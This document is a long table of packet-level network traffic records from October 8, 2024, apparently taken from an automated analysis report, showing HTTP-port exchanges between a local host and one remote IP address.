                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043072939 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043103933 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043571949 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043740034 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043797970 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043905973 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043921947 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043937922 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043952942 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043962002 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044007063 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044075012 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044120073 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044594049 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044636965 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044784069 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044795990 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044816971 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044831991 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044832945 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044856071 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044857025 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044867992 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044872999 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044892073 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.044908047 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045490980 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045551062 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045661926 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045674086 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045708895 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045805931 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045816898 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045838118 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045850039 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045854092 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045876026 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.045887947 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046582937 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046593904 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046616077 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046632051 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046636105 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046653986 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046679020 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046756029 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046768904 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046788931 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046803951 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046823978 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047602892 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047616959 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047636986 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047652960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047657013 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047663927 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047674894 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047688961 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047691107 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047708035 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047723055 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047725916 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047760010 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048614979 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048625946 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048639059 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048681021 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129527092 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129537106 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129656076 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129689932 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129714012 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129719973 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129725933 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129745960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129749060 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129755974 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129761934 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129791975 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129848003 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129854918 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129859924 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129883051 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129893064 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129900932 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129918098 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.130067110 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.729429007 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734328032 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734447956 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734661102 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.739552975 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.757370949 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200908899 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200983047 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201010942 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201028109 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201035023 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201040030 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201046944 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201061964 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201077938 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201092958 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201093912 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201158047 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201158047 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206182003 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206219912 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206257105 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206326008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206326008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.219839096 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287586927 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287620068 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287632942 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287647009 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287657022 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287673950 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287729979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287729979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287990093 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288009882 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288021088 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288125992 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288137913 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288180113 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288180113 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288682938 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288723946 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288734913 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288734913 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288783073 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288814068 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288825035 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288875103 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288875103 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289864063 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289875984 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289887905 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289932966 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289957047 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289969921 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290026903 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290441036 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290469885 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290479898 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290508986 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290563107 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.292670965 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.292681932 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.292756081 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376661062 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376674891 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376765013 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376807928 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376827955 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376838923 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376852989 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376867056 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376878023 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376883030 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376888037 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376888037 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376907110 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376918077 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376928091 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376936913 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376936913 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376940012 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376951933 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376966000 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376979113 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.376996994 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377007008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377007008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377010107 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377022982 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377036095 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377038002 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377052069 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377067089 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377098083 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377129078 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377194881 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377206087 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377218008 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377245903 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377257109 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377264977 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377269030 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377289057 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377336979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377336979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377368927 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377381086 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377392054 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377403975 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377419949 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377451897 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.377681971 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378035069 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378088951 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378093004 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378107071 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378146887 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378160000 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378173113 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378184080 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378204107 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378226995 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378314018 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378326893 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378338099 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378350019 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378361940 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378367901 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378375053 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378396034 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378424883 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378448963 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378582001 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.378642082 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463459015 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463470936 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463484049 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463531971 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463555098 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463633060 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463646889 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463658094 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463669062 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463679075 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463721991 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463721991 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463783026 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463800907 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463810921 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.463915110 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464096069 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464107037 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464118004 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464147091 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464169979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464255095 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464268923 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464287043 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464330912 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464330912 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464389086 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464401007 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464493036 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464525938 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464555979 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464569092 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464579105 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464591026 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464607954 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464632034 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464632988 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464656115 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464833975 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464845896 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464894056 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.464998007 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465013027 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465017080 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465049982 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465076923 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465117931 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465174913 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465187073 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465197086 CEST8049165192.3.220.40192.168.2.22
